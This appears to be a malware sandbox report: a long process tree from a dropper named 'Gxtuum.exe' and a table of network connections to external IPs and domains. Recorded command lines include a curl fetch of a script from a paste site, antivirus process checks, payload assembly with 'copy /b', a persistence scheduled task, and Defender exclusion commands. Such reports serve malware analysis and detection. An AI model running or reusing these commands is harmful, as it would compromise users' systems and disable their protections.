"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:4
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\system32\curl.exe
curl -o webpage.py -s https://rentry.co/sntwm349/raw --insecure
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c md 369580
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\findstr.exe
findstr /V "MaskBathroomsCompoundInjection" Participants
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Massachusetts + Radius + Dental + Vendor + Fighting + June + Stockings + Convenience + Falls + Joke + Mask + Severe + Outreach + Sig + Bdsm 369580\Z
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\369580\Origin.pif
369580\Origin.pif 369580\Z
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\timeout.exe
timeout 15
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\Admin\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\System.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\Files\System.exe
C:\Users\Admin\AppData\Local\Temp\Files\System.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe"
C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe
C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe
"C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe"
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | ftp.ywxww.net | udp |
| US | 8.8.8.8:53 | 49.130.101.151.in-addr.arpa | udp |
| CN | 60.191.208.187:820 | ftp.ywxww.net | tcp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| HK | 103.149.92.191:80 | | tcp |
| CN | 101.133.156.69:7777 | | tcp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 137.184.144.245:4782 | | tcp |
| N/A | 192.168.100.18:4782 | | tcp |
| RU | 185.215.113.217:80 | 185.215.113.217 | tcp |
| US | 8.8.8.8:53 | 217.113.215.185.in-addr.arpa | udp |
| IN | 122.170.110.131:9105 | 122.170.110.131 | tcp |
| US | 8.8.8.8:53 | 131.110.170.122.in-addr.arpa | udp |
| US | 137.184.144.245:4782 | | tcp |
| N/A | 192.168.100.18:4782 | | tcp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 64.190.113.79:443 | | tcp |
| US | 8.8.8.8:53 | 79.113.190.64.in-addr.arpa | udp |
| US | 64.190.113.79:443 | | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| US | 64.190.113.79:443 | | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 64.190.113.79:443 | | tcp |
| US | 64.190.113.79:443 | | tcp |
| RU | 83.149.17.194:80 | 83.149.17.194 | tcp |
| US | 8.8.8.8:53 | 194.17.149.83.in-addr.arpa | udp |
| CN | 183.57.21.131:8095 | | tcp |
| US | 64.190.113.79:443 | | tcp |
| US | 64.190.113.79:443 | | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 64.190.113.79:443 | | tcp |
| US | 8.8.8.8:53 | rl.ammyy.com | udp |
| NL | 188.42.129.148:80 | rl.ammyy.com | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| DE | 136.243.104.235:443 | | tcp |
| US | 64.190.113.79:443 | | tcp |
| US | 137.184.144.245:4782 | | tcp |
| N/A | 192.168.100.18:4782 | | tcp |
| US | 8.8.8.8:53 | 148.129.42.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.104.243.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.ammyy.com | udp |
| DE | 136.243.18.118:80 | www.ammyy.com | tcp |
| US | 64.190.113.79:443 | | tcp |
| US | 8.8.8.8:53 | 118.18.243.136.in-addr.arpa | udp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.134.89:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.134.221.88.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| FR | 176.150.119.15:56001 | | tcp |
| US | 64.190.113.79:443 | | tcp |
| US | 64.190.113.79:443 | | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 142.250.179.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 64.190.113.79:443 | | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
